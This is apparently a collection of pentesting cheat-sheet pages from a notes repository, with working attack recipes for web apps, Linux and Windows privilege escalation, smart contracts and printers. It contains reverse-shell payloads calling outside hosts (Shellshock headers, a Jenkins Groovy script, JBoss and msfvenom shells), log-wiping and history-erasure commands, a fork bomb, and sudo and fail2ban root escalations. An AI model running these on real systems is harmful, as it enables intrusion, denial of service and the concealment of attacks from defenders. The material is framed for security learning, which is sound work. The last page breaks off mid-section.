“ng-app” attribute that bootstraps the application, so you can check for it in the HTML source. 8 | 9 | ```html 10 | <html ng-app> 
11 | ``` 12 | 13 | ## Client-Side Template Injection (CSTI) 14 | 15 | AngularJS evaluates `{{ }}` expressions inside the `ng-app` scope, so reflected user input there is executed as an expression. The payloads below work on AngularJS 1.6 and later, where the expression sandbox was removed; older versions need a version-specific sandbox bypass. 16 | 17 | ```bash 18 | {{2*3}} 19 | {{$on.constructor('alert("test")')()}} 20 | {{constructor.constructor('alert("test")')()}} 21 | 22 | 23 | 
22 | ``` 23 | 24 | It is worth testing whether the input filter can be bypassed as below. 25 | 26 | ```bash 27 | # Remove one pair of braces 28 | {2*3} 29 | 30 | # Remove all braces 31 | 2*3 32 | 33 | # Add additional braces 34 | {{{2*3}}} 35 | ``` -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/contract-address-recovery.md: -------------------------------------------------------------------------------- 1 | # Contract Address Recovery 2 | 3 | ## Create a Contract for Recovering an Address 4 | 5 | A contract created by a normal transaction (`CREATE`) lives at `keccak256(rlp([sender, nonce]))[12:]`, so the address of a lost contract can be recomputed from its creator and the creator's nonce at the time. In the contract below the bytes are the RLP encoding for a 20-byte sender and nonce 1: `0xd6` is the list prefix (`0xc0 + 22`), `0x94` the string prefix for 20 bytes (`0x80 + 20`), and `0x01` the nonce; for nonce 0 the last byte is `0x80` (the empty string). 6 | 7 | ```js 8 | // SPDX-License-Identifier: MIT 9 | pragma solidity ^0.8.0; 10 | 11 | contract ContractRecovery { 12 | 13 | constructor(address _creatorAddress) { 14 | address lostAddress = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), address(_creatorAddress), bytes1(0x01)))))); 15 | // some code here ... 16 | } 17 | } 18 | ``` 19 | 20 | Another way is to use the [Etherscan](https://etherscan.io/) transaction history of the creator. 21 | 22 | ## References 23 | 24 | - [StackExchange](https://ethereum.stackexchange.com/questions/760/how-is-the-address-of-an-ethereum-contract-computed) 25 | - [Dixitaditya](https://blog.dixitaditya.com/ethernaut-level-17-recovery) -------------------------------------------------------------------------------- /docs/exploit/machine-learning/data-processing/dimensionality-reduction.md: -------------------------------------------------------------------------------- 1 | # Dimensionality Reduction for Machine Learning 2 | 3 | Dimensionality reduction is a preprocessing step that projects data onto fewer features, which makes models easier to train and often exposes the structure hidden in a dataset. 
4 | 5 | ## PCA (Principal Component Analysis) 6 | 7 | Reference: [https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42) 8 | 9 | We use **PCA** to find how many dimensions the data really needs: the point where `explained_variance_ratio_` stops growing tells us how many components carry the signal. 10 | 11 | ```python 12 | import numpy as np 13 | from sklearn.decomposition import PCA 14 | 15 | data = np.load("example.npy") 16 | 17 | for i in range(1, 10): 18 | pca = PCA(n_components=i) 19 | principal_components = pca.fit_transform(data) 20 | # fraction of the variance captured by each of the i components 21 | print(i, pca.explained_variance_ratio_) 22 | ``` 23 | 24 | ## References 25 | 26 | - [Kaggle](https://www.kaggle.com/competitions/ai-village-ctf) -------------------------------------------------------------------------------- /docs/exploit/web/code-deobfuscation.md: -------------------------------------------------------------------------------- 1 | # Code Deobfuscation 2 | 3 | This technique turns obfuscated code (such as JavaScript) back into something readable. 4 | 5 | ## Deobfuscation 6 | 7 | - **JavaScript** 8 | 9 | - **[JavaScript Deobfuscator](https://deobfuscate.io/)** 10 | 11 | 
12 | 13 | ## Obfuscation 14 | 15 | 1. **JavaScript** 16 | 17 | - **Manual Obfuscation** 18 | 19 | 1. Access [https://obfuscator.io/](https://obfuscator.io/). 20 | 21 | 2. Change “String Array Encoding” to “Base64”. 22 | 23 | 3. Paste the JavaScript code. 24 | 25 | 4. Click "Obfuscate". 26 | 27 | 5. Try running it on [https://jsconsole.com/](https://jsconsole.com/). 28 | 29 | - **Use Online Tools** 30 | 31 | - **[JSFuck](http://www.jsfuck.com/)** 32 | 33 | - **[jjencode](https://utf-8.jp/public/jjencode.html)** 34 | 35 | - **[aaencode](https://utf-8.jp/public/aaencode.html)** -------------------------------------------------------------------------------- /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | name: ci 2 | on: 3 | push: 4 | branches: 5 | - master 6 | - main 7 | permissions: 8 | contents: write 9 | jobs: 10 | deploy: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - uses: actions/checkout@v4 14 | - name: Configure Git Credentials 15 | run: | 16 | git config user.name github-actions[bot] 17 | git config user.email 41898282+github-actions[bot]@users.noreply.github.com 18 | - uses: actions/setup-python@v5 19 | with: 20 | python-version: 3.x 21 | - run: echo "cache_id=$(date --utc '+%V')" >> $GITHUB_ENV 22 | - uses: actions/cache@v4 23 | with: 24 | key: mkdocs-material-${{ env.cache_id }} 25 | path: ~/.cache 26 | restore-keys: | 27 | mkdocs-material- 28 | - run: pip install mkdocs-material "mkdocs-material[imaging]" 29 | - run: mkdocs gh-deploy --force -------------------------------------------------------------------------------- /docs/exploit/network/firewall.md: -------------------------------------------------------------------------------- 1 | # Firewall 2 | 3 | A firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. The commands below are for `ufw` (Uncomplicated Firewall), the iptables front end shipped with Ubuntu; they need root. 
4 | 5 | ## Status 6 | 7 | ```sh 8 | ufw status 9 | ufw status verbose 10 | ``` 11 | 12 | ## Enable/Disable the Firewall 13 | 14 | ```sh 15 | ufw enable 16 | 17 | ufw disable 18 | ``` 19 | 20 | ## Set Default Policies 21 | 22 | ```sh 23 | # Allow all incoming traffic by default 24 | ufw default ALLOW 25 | 26 | # Deny all incoming traffic by default 27 | ufw default DENY 28 | ``` 29 | 30 | ## Rules 31 | 32 | - **Allow** 33 | 34 | ```sh 35 | ufw allow 22 36 | ufw allow 22/tcp 37 | ufw allow 80 38 | ufw allow 80/tcp 39 | 40 | # Allow the given IP address access to port 22 for all protocols 41 | ufw allow from <ip> to any port 22 42 | ``` 43 | 44 | - **Deny** 45 | 46 | ```sh 47 | ufw deny 22 48 | ufw deny 22/tcp 49 | ufw deny 80 50 | ufw deny 80/tcp 51 | ``` -------------------------------------------------------------------------------- /docs/exploit/network/redos.md: -------------------------------------------------------------------------------- 1 | # ReDoS (Regular Expression Denial of Service) 2 | 3 | ReDoS is an attack against regular expressions whose matching time grows exponentially on crafted input (catastrophic backtracking), so a single request can pin a CPU core for minutes. 4 | 5 | ## Evil (Vulnerable) Regex 6 | 7 | Nested or overlapping quantifiers are the usual culprit: the engine has many ways to split the same run of characters between the groups, and tries them all before failing. 8 | 9 | ```html 10 | (a+)+ 11 | ([a-zA-Z]+)* 12 | (a|aa)+ 13 | (a|a?)+ 14 | (.*a){x} for x \> 10 15 | ^(([a-z])+.)+[A-Z]([a-z])+$ 16 | 17 | 18 | /^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/ 19 | ``` 20 | 21 | ## Malicious Input 22 | 23 | If a target website validates user input with one of the vulnerable regexes above, the following input (a long run that almost matches, followed by a character that forces failure) can exhaust the server's CPU: 24 | 25 | ```bash 26 | aaaaaaaaaaaaaaaaaaaaaaaa! 
25 | ``` 26 | 27 | ## References 28 | 29 | - [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) -------------------------------------------------------------------------------- /docs/exploit/linux/post-exploitation/cover-your-tracks.md: -------------------------------------------------------------------------------- 1 | # Cover Your Tracks in Linux 2 | 3 | After exploitation of a Linux system, attackers want to erase traces of their activity and remain undetected. 4 | 5 | ## Clear History 6 | 7 | ```bash 8 | # Stop the current shell from writing history (HISTFILE/HISTSIZE), then wipe what exists 9 | unset HISTORY 10 | echo '' > ~/.bash_history 11 | echo '' > /root/.bash_history 12 | history -c 13 | export HISTSIZE=0 14 | unset HISTFILE 15 | ``` 16 | 17 | ## Clear Logs 18 | 19 | ```bash 20 | # Shrink the size of log files with `truncate -s 0` 21 | truncate -s 0 /var/log/auth.log 22 | echo '' > /var/log/auth.log 23 | cat /dev/null > /var/log/auth.log 24 | > /var/log/auth.log 25 | dd if=/dev/null of=/var/log/auth.log 26 | shred /var/log/auth.log 27 | ``` 28 | 29 | ## References 30 | 31 | - [Nullbyte](https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/) 32 | - [PopLabSec](https://www.poplabsec.com/how-to-cover-your-tracks-on-linux/) 33 | -------------------------------------------------------------------------------- /docs/exploit/windows/privilege-escalation/spn-jacking.md: -------------------------------------------------------------------------------- 1 | # SPN-Jacking 2 | 3 | If the current user has the right to write the `servicePrincipalName` attribute of another account (for example GenericWrite or WriteProperty on it), we can assign that account an arbitrary SPN, request a service ticket for it (targeted Kerberoasting), and crack the ticket offline to recover the account's password for lateral movement or privilege escalation. 4 | 5 | ## Exploit 6 | 7 | ### 1. Set SPN and Get the Hash of the Service Ticket 8 | 9 | ```bash 10 | # 1. Import PowerView module 11 | . .\PowerView.ps1 12 | 13 | # 2. Set SPN on the target account 14 | Set-DomainObject -Identity <target-user> -SET @{serviceprincipalname='evil/evil'} 15 | 16 | # 3. Request a service ticket for it 17 | Get-DomainSPNTicket -SPN evil/evil 18 | ``` 19 | 20 | ### 2. 
Crack the Hash 21 | 22 | After that, we retrieve the hash of the ticket, so crack it on your local machine: 23 | 24 | ```bash 25 | # -m 13100: Replace it with the appropriate number depending on the algorithm. 26 | hashcat -a 0 -m 13100 hash.txt wordlist.txt 27 | ``` 28 | 29 | ## References 30 | 31 | - [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/spn-jacking) -------------------------------------------------------------------------------- /docs/exploit/web/cacti.md: -------------------------------------------------------------------------------- 1 | # Cacti Pentesting 2 | 3 | Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application. 4 | 5 | ## Default Credentials 6 | 7 | ```bash 8 | admin:admin 9 | ``` 10 | 11 | ## Common Directories 12 | 13 | ```bash 14 | /include/config.php 15 | ``` 16 | 17 | ## Remote Code Execution (RCE) CVE-2022-46169 18 | 19 | Reference: [https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/) 20 | 21 | ```bash 22 | msfconsole 23 | msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection 24 | msf> (set options...) 25 | msf> run 26 | ``` 27 | 28 | Also we can refer to [Exploit DB](https://www.exploit-db.com/exploits/51166). 29 | 30 | ## References 31 | 32 | - [Pentest Tools](https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169) -------------------------------------------------------------------------------- /docs/exploit/web/cgi.md: -------------------------------------------------------------------------------- 1 | # CGI Pentesting 2 | 3 | CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. 
If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command. 4 | 5 | ## Enumeration CGI Scripts 6 | 7 | ```bash 8 | ffuf -u https://example.com/cgi-bin/FUZZ.cgi -w wordlist.txt 9 | ``` 10 | 11 | ## Shellshock 12 | 13 | Shellshock is the vulnerability of bash v1.0.3-4.3 that allows users to execute arbitrary commands. 14 | If we found the CGI script under **`/cgi-bin/`**, modifying HTTP header to remote code execution. 15 | 16 | ```bash 17 | GET /cgi-bin/example.cgi HTTP/1.1 18 | 19 | User-Agent: () { :; }; /bin/bash -c "sleep 5" 20 | Cookie: () { :; }; /bin/bash -c "sleep 5" 21 | 22 | # Reverse Shell 23 | User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" 24 | ``` -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/denial-of-service-attack.md: -------------------------------------------------------------------------------- 1 | # DoS Attack for Smart Contract 2 | 3 | We can denial the Solidity execution by consuming all gas using various ways. 4 | 5 | ## DoS with Assembly Invalid Function 6 | 7 | The `invalid()` opcode in in-line assembly consumes all the gas and causes Dos for the contract. 8 | 9 | ```js 10 | // SPDX-License-Identifier: MIT 11 | pragma solidity ^0.8.0; 12 | 13 | contract Victim { 14 | address public owner; 15 | uint public balance; 16 | 17 | function withdrawUser(address _address) { 18 | (bool success, ) = _address.call{value: balance}(""); 19 | // Some code ... 
20 | } 21 | } 22 | 23 | contract Attack { 24 | Victim target; 25 | 26 | constructor(address _targetAddress) { 27 | target = Victim(_targetAddress); 28 | target.withdrawUser(address(this)); 29 | } 30 | 31 | fallback() payable external { 32 | assembly { 33 | invalid() 34 | } 35 | } 36 | } 37 | ``` 38 | -------------------------------------------------------------------------------- /docs/exploit/blockchain/smart-contract/index.md: -------------------------------------------------------------------------------- 1 | # Smart Contract Attack Methodology 2 | 3 | When attacking target contract, we can create an attack contract which loads the target contract and abuse it. 4 | 5 | ## Create an Attack Contract 6 | 7 | ```js 8 | // SPDX-License-Identifier: MIT 9 | pragma solidity ^0.8.0; 10 | 11 | // Define interface for victim contract 12 | interface IVictim { 13 | // Set the Victim contract functions 14 | function example1() external; 15 | function example2(uint) external; 16 | } 17 | 18 | // Define Attack contract to compromise the victim contract 19 | contract Attack { 20 | IVictim public victim; 21 | 22 | constructor(address _victimAddress) { 23 | // Initialize Victim contract (interface) 24 | victim = IVictim(_victimAddress); 25 | } 26 | 27 | // Create a function to be used for attacking the victim contract 28 | function attack() public { 29 | victim.example1(); 30 | victim.example2(1); 31 | } 32 | } 33 | ``` -------------------------------------------------------------------------------- /docs/exploit/printer/raw-printing.md: -------------------------------------------------------------------------------- 1 | # Raw Printing Pentesting 2 | 3 | PLJ (Printer Job Languages) is a method for switching printer languages. A default port is 9100. 
4 | 5 | ## Enumeration 6 | 7 | ```sh 8 | nmap --script pjl-ready-message -p 9100 9 | ``` 10 | 11 | ## Connect 12 | 13 | ```bash 14 | nc 9100 15 | ``` 16 | 17 | ## Commands 18 | 19 | ```bash 20 | # See printer information 21 | @PJL INFO STATUS 22 | @PJL INFO ID 23 | @PJL INFO PRODINFO 24 | 25 | # See directories in the system 26 | @PJL FSDIRLIST NAME="0:" ENTRY=1 27 | @PJL FSDIRLIST NAME="0:/../" ENTRY=1 28 | @PJL FSDIRLIST NAME="0:/../etc/" ENTRY=1 29 | @PJL FSDIRLIST NAME="0:/../home/" ENTRY=1 30 | 31 | # See contents of a file 32 | @PJL FSUPLOAD NAME="0:/../etc/passwd" ENTRY=1 33 | ``` 34 | 35 | ## References 36 | 37 | - [hp](https://developers.hp.com/system/files/PJL_Technical_Reference_Manual.pdf) 38 | - [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/9100-pjl) -------------------------------------------------------------------------------- /docs/exploit/web/jenkins.md: -------------------------------------------------------------------------------- 1 | # Jenkins Pentesting 2 | 3 | Jenkins is an automation server which helps automate the parts of software development related to building, testing, and deploying, etc. 4 | 5 | ## Brute Force Credentials 6 | 7 | ```sh 8 | msfconsole 9 | msf > use auxiliary/scanner/http/jenkins_login 10 | ``` 11 | 12 | ## Reverse Shell on Dashboard 13 | 14 | You need to have the credential. 15 | 16 | 1. **Opening Listener on Your Local Machine** 17 | 18 | ```sh 19 | nc -lvnp 4444 20 | ``` 21 | 22 | 2. **Login to Jenkins** 23 | 24 | Access "http://localhost:8080" in browser and login. 25 | 26 | 3. **Click "Manage Jenkins" -> "Script Console"** 27 | 28 | 4. **Add the Payload in the Console** 29 | 30 | ```java 31 | r = Runtime.getRuntime() 32 | p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp//4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 33 | p.waitFor() 34 | ``` 35 | 36 | 5. **Click "Run"** 37 | 38 | Then you should get a shell. 
-------------------------------------------------------------------------------- /docs/exploit/linux/forkbomb.md: -------------------------------------------------------------------------------- 1 | # Fork Bomb 2 | 3 | Fork Bomb is one of the denial-of-service attacks which lead the system to deplete the available resources by replicating a child process infinitely. 4 | 5 | ### Warning 6 | 7 | **Please don’t execute the following programs in system that you don’t want to harm.** 8 | 9 | ## Exploitation in C 10 | 11 | This program forks child processes continuously. 12 | 13 | ```c 14 | #include 15 | #include 16 | 17 | int main() 18 | { 19 | while (1) 20 | // Create a child process from the parent process. 21 | fork(); 22 | return 0; 23 | } 24 | ``` 25 | 26 | ## Exploitation in Python 27 | 28 | ```python 29 | import os 30 | 31 | while True: 32 | os.fork() 33 | ``` 34 | 35 | ## Exploitation in Bash 36 | 37 | ```bash 38 | :(){ :|: & };: 39 | ``` 40 | 41 | ## References 42 | 43 | - [GeeksForGeeks](https://www.geeksforgeeks.org/zombie-processes-prevention/?ref=ml_lbp) 44 | - [Imperva](https://www.imperva.com/learn/ddos/fork-bomb/) 45 | -------------------------------------------------------------------------------- /docs/exploit/linux/privilege-escalation/sudo/path-traversal.md: -------------------------------------------------------------------------------- 1 | # Sudo Path Traversal Privilege Escalation 2 | 3 | If some `sudo` command receives a file path, we might escalate to privileges using path traversal. 4 | 5 | ## Investigation 6 | 7 | ```sh 8 | sudo -l 9 | 10 | (ALL) /usr/bin/node /usr/local/scripts/*.js 11 | ``` 12 | 13 | If the file path uses wildcards, we may execute arbitrary files. 14 | In short, we can refer to files in different directories which the system owner unintended. 15 | 16 |
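Why the wildcard rule above accepts a path that escapes the intended directory, as an added Python example that is not part of the original notes: glob-style matching lets `*` span `/` and `..`, so a containment check on the normalised path is the control that is missing. Python's `fnmatch` stands in for the rule matcher here (it is not sudo's own implementation), and `TRUSTED_DIR` and the sample paths are constructed for the example.

```python
import fnmatch
import posixpath

# Constructed from the sudo -l output above: the argument pattern the rule accepts
# and the directory the system owner actually meant to expose.
RULE_PATTERN = "/usr/local/scripts/*.js"
TRUSTED_DIR = "/usr/local/scripts"


def rule_matches(arg, pattern=RULE_PATTERN):
    """Glob match in which '*' also spans '/' (fnmatch semantics).

    Stands in for the rule matcher to show why an argument containing '..'
    still satisfies the pattern.
    """
    return fnmatch.fnmatchcase(arg, pattern)


def stays_within(arg, base=TRUSTED_DIR):
    """Hardened check: collapse '..' segments lexically and require the result
    to be the base directory itself or a path below it."""
    resolved = posixpath.normpath(arg)
    base = posixpath.normpath(base)
    return resolved == base or resolved.startswith(base + "/")


def evaluate(arg):
    """Compare the two policies for one argument."""
    return {
        "pattern_match": rule_matches(arg),
        "within_trusted_dir": stays_within(arg),
        "resolved": posixpath.normpath(arg),
    }


if __name__ == "__main__":
    for candidate in (
        "/usr/local/scripts/backup.js",             # what the owner intended
        "/usr/local/scripts/../../../tmp/test.js",  # the traversal from the notes
        "/tmp/test.js",                             # rejected by both checks
    ):
        print(candidate, evaluate(candidate))
```

`posixpath.normpath` is used so the example runs without those paths existing; on a live system, resolve with `os.path.realpath` before the containment check so that a symlink inside the trusted directory cannot point elsewhere.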
## Exploitation

Assume we can execute the `node` command as root with a JS file as its argument.
Create **`test.js`** under **/tmp**, which spawns a root shell when run by **`node`**.

```js
// /tmp/test.js
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
```

Now run the `node` command as root, passing the file through path traversal.

```sh
sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js
```

--------------------------------------------------------------------------------
/docs/exploit/windows/forensics/onedrive-logs.md:
--------------------------------------------------------------------------------

# OneDrive Logs

OneDrive log files can be read after deobfuscation.

## Deobfuscating Log Files

To read OneDrive logs, we need to deobfuscate the log files (**`.odl`, `.odlsent`, `.odlgz`**).
On **Windows**, these logs are located in:

- `C:\Users\<username>\AppData\Local\Microsoft\OneDrive\logs\Personal\`
- `C:\Users\<username>\AppData\Local\Microsoft\OneDrive\logs\Business1\`

[This repository](https://github.com/ydkhatri/OneDrive) is useful for deobfuscating OneDrive logs.

```bash
python -m venv venv
# on Windows
.\venv\Scripts\activate
pip install construct pycryptodome
python odl.py -o .\output.csv c:\Users\<username>\AppData\Local\Microsoft\OneDrive\logs\Personal\
```

After that, we can read the output file (`output.csv`) with tools such as VS Code or Excel.
This file contains sensitive information such as the OneDrive account email, access tokens, etc.

--------------------------------------------------------------------------------
/docs/exploit/machine-learning/orange-data-mining.md:
--------------------------------------------------------------------------------

# Orange Data Mining

Orange is data-mining and machine learning software that allows users to analyze data, create visualizations, and build predictive models.

## Installation & Start

On Linux, Orange can be installed with pip.

```bash
pip install PyQt5 PyQtWebEngine
pip install orange3
```

## Basic Usage

### 1. Start Orange

```bash
python -m Orange.canvas
```

### 2. Open an .OWS File

When Orange starts, open the ".ows" file.

### 3. Import a Data File

Add the File widget from the left pane, and import a data file such as a ".csv".

### 4. Workflows

Connect the File widget to the Scatter Plot widget and open the Scatter Plot. We can see the data as a plot.

## References

- [Orange](https://orange3.readthedocs.io/projects/orange-visual-programming/en/latest/index.html)

--------------------------------------------------------------------------------
/docs/exploit/web/framework/django.md:
--------------------------------------------------------------------------------

# Django Pentesting

Django is a web framework written in Python.

## SSTI (Server-Side Template Injection)

```bash
# XSS
{{ `` }}

# Debug information
{% debug %}
```

## Bypass ALLOWED_HOSTS

If we get the error **"Invalid HTTP_HOST header: 'x.x.x.x:8000'. You may need to add 'x.x.x.x' to ALLOWED_HOSTS"** when accessing a website written in Django, intercept the request and change the value of the Host header.
Then you should be able to access the website.
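The check behind that error message, as an added Python example that is not from the original notes and not Django's own code, though it follows the matching rule Django documents for `ALLOWED_HOSTS`: exact entries, leading-dot entries that cover a domain and all of its subdomains, `*` for anything, and the port being ignored. The host names and setting values below are constructed.

```python
def split_domain_port(host):
    """Split a Host header value into (domain, port), lower-cased.

    Modelled on Django's helper of the same name: a bracketed IPv6 literal
    keeps its brackets and a trailing dot on the domain is dropped.
    """
    host = host.lower()
    if host.endswith("]"):
        # "[::1]" with no port
        domain, port = host, ""
    else:
        domain, sep, port = host.rpartition(":")
        if not sep or "]" in port:
            # no port at all, e.g. "example.com"
            domain, port = host, ""
    if domain.endswith("."):
        domain = domain[:-1]
    return domain, port


def is_same_domain(host, pattern):
    """ALLOWED_HOSTS rule for one entry: an exact match, or, for an entry that
    starts with '.', the domain itself or any subdomain of it."""
    if not pattern:
        return False
    pattern = pattern.lower()
    return (
        pattern[0] == "." and (host.endswith(pattern) or host == pattern[1:])
        or pattern == host
    )


def host_allowed(host_header, allowed_hosts):
    """True if the request's Host header passes ALLOWED_HOSTS.

    The port is discarded before matching, which is why 'x.x.x.x:8000' in the
    error message needs only 'x.x.x.x' in the setting.
    """
    domain, _port = split_domain_port(host_header)
    return any(p == "*" or is_same_domain(domain, p) for p in allowed_hosts)


if __name__ == "__main__":
    setting = ["127.0.0.1", ".example.com"]       # constructed ALLOWED_HOSTS
    for header in ("203.0.113.5:8000", "api.example.com", "evil-example.com"):
        print(header, host_allowed(header, setting))
```

A `'*'` entry makes `host_allowed` return True for every request, which removes the protection against Host header attacks that the setting exists to provide; adding a single IP or hostname, as the notes do, keeps the check meaningful.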
```bash
Host: 0.0.0.0:8000
# or
Host: 127.0.0.1:8000
```

Or, if we have permission to edit the configuration of the website, add the new IP address to **ALLOWED_HOSTS** in **`settings.py`**.

```python
ALLOWED_HOSTS = ['0.0.0.0', '127.0.0.1', 'x.x.x.x']
```

## Create a New User

```bash
python3 manage.py createsuperuser
```

--------------------------------------------------------------------------------
/docs/exploit/web/tool/add-custom-http-headers.md:
--------------------------------------------------------------------------------

# Add Custom HTTP Headers in Burp Suite

In Burp Suite, we can add custom headers by setting up options.

## Add Custom HTTP Headers

In some cases, such as bug bounty programs, it is convenient to set custom HTTP headers in advance.

1. Go to the **Proxy -> Options** tab.
2. Scroll down to **"Match and Replace"**.
3. Click **"Add"**.
4. Set the rule:

- **User Agent**

```txt
Type: Request header
Match: ^User-Agent.*$
Replace: User-Agent: HackerOne-username
Comment:
```

- **New Original Header**

```txt
Type: Request header
Match: (empty)
Replace: X-Bug-Bounty: HackerOne-username
Comment:
```

5. Check the **"Regex match"** box.
6. Click **"OK"**.
7. Find the rule in the list and check **"Enabled"**.

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/sudo/java.md:
--------------------------------------------------------------------------------

# Sudo Java Privilege Escalation

The `sudo java` command might be vulnerable to privilege escalation.

## Investigation

```bash
sudo -l

(root) /usr/bin/java -jar *.jar
```

If we can execute the java command with an arbitrary **`.jar`** file as root, we can escalate privileges.

## Exploitation

### 1. Create a JAR File

First, create a custom jar file on the local machine.
Replace **`<local-ip>`** with your local IP address.

```bash
msfvenom -p java/shell_reverse_tcp LHOST=<local-ip> LPORT=4444 -f jar -o shell.jar
```

Then transfer the file to the remote machine.

### 2. Reverse Shell

On the local machine, start a listener.

```bash
nc -lvnp 4444
```

Now execute the java command as root on the target machine.

```bash
sudo /usr/bin/java -jar /tmp/shell.jar
```

We should get a root shell.

--------------------------------------------------------------------------------
/docs/exploit/web/framework/ajp.md:
--------------------------------------------------------------------------------

# AJP (Apache JServ Protocol) Pentesting

AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. The default port is 8009.

## Enumeration

```sh
nmap --script ajp-auth -p 8009 <target-ip>
nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 <target-ip>
nmap --script ajp-brute -p 8009 <target-ip>
nmap --script ajp-headers -p 8009 <target-ip>
nmap --script ajp-methods -p 8009 <target-ip>
nmap --script ajp-request -p 8009 <target-ip>
```

## Ghostcat File Inclusion

Ghostcat is a vulnerability in **Tomcat AJP** ([CVE-2020-1938](https://www.exploit-db.com/exploits/49039)).
Use Metasploit to exploit it.

```sh
msfconsole
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts <target-ip>
msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit
```

--------------------------------------------------------------------------------
/docs/exploit/cryptography/algorithm/kdbx-files.md:
--------------------------------------------------------------------------------

# KDBX Files

A KDBX file is a password database created by KeePass Password Safe.

## Open KDBX File

If KeePass is not installed on our system, run the following command.

```bash
sudo apt install keepassx
# or
sudo apt install keepass2
```

To open **KeePass**, run the following command.

```sh
keepassx
# or
keepass2
```

### Copy Password

Right-click on the password value, then click **Copy Password**.

## Crack KDBX Password

If KeePass asks for the Master Key when opening the KDBX file, you need to crack the password of the KDBX file. **John The Ripper** can be used to crack it.

### 1. Convert to Hash

```sh
keepass2john example.kdbx > hash.txt
```

### 2. Crack the Hash

```sh
john --wordlist=wordlist.txt hash.txt
# or
hashcat -m 13400 -a 0 hash.txt wordlist.txt
```

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/sudo/shutdown-poweroff.md:
--------------------------------------------------------------------------------

# Sudo Shutdown, Poweroff Privilege Escalation

The `sudo shutdown` command might be vulnerable to privilege escalation (PrivEsc).

## Investigation

```sh
sudo -l

(ALL) NOPASSWD: /usr/sbin/shutdown
```

If we can execute the **"shutdown"** command as root, we can gain root privileges by hijacking the lookup of **"poweroff"** on the PATH.

## Exploitation

First, create a **/tmp/poweroff** script which invokes a shell.

```sh
echo /bin/sh > /tmp/poweroff
# or
echo /bin/bash > /tmp/poweroff
```

Then make the file executable and add the **"/tmp"** folder to the front of **PATH**.

```sh
chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
```

Now execute **"shutdown"** as root.

```sh
# Run the permitted command through sudo
sudo /usr/sbin/shutdown

# Then you are the root user
root>
```

**/tmp/poweroff** is executed and spawns a root shell.

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/sudo/fail2ban-command.md:
--------------------------------------------------------------------------------

# Sudo Fail2ban-Client Privilege Escalation

The `sudo fail2ban-client` command might be vulnerable to privilege escalation (PrivEsc).

## Investigation

```bash
sudo -l

# Output:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
```

If we can execute the `fail2ban-client` command as root, we may be able to escalate privileges and gain a root shell.

## Exploit

```bash
# Get jail list
sudo /usr/bin/fail2ban-client status
# Choose one of the jails from the "Jail list" in the output.
sudo /usr/bin/fail2ban-client get <jail> actions
# Create a new action with an arbitrary name (e.g. "evil")
sudo /usr/bin/fail2ban-client set <jail> addaction evil
# Set payload to actionban
sudo /usr/bin/fail2ban-client set <jail> action evil actionban "chmod +s /bin/bash"
# Trigger the action
sudo /usr/bin/fail2ban-client set <jail> banip 1.2.3.5
# Now we gain root
/bin/bash -p
```

--------------------------------------------------------------------------------
/docs/exploit/web/jboss.md:
--------------------------------------------------------------------------------

# JBoss Pentesting

JBoss AS (Application Server), now known as WildFly, is an application server written in Java.

## Enumeration

```sh
msfconsole
msf > use auxiliary/scanner/http/jboss_vulnscan
```

## Common Directories

```txt
/admin-console/
/invoker/JMXInvokerServlet
/jbossws/
/jmx-console/
/jmx-console/HtmlAdaptor
/management
/manager
/status?full=true
/web-console/
/web-console/Invoker
/web-console/ServerInfo.jsp
```

## Default Credentials

```txt
admin:admin
```

## Exploitation

[JexBoss](https://github.com/joaomatosf/jexboss) is available as an exploitation CLI tool.

```bash
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip3 install -r requirements.txt
python3 jexboss.py -host https://example.com:8080

# Reverse Shell
Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1
```

--------------------------------------------------------------------------------
/docs/exploit/web/webdav.md:
--------------------------------------------------------------------------------

# WebDAV Pentesting

WebDAV is a set of extensions to the Hypertext Transfer Protocol which allows user agents to collaboratively author content directly on an HTTP web server.

## Enumeration

```sh
msfconsole
msf> use auxiliary/scanner/http/webdav_scanner
```

## Default Credentials

```sh
wampp:xampp
```

## Reverse Shell

### 1. Check if the exploit can be uploaded

```sh
davtest -url http://example.com/davdir -auth 'user:pass'
```

### 2. Upload the Reverse Shell Script

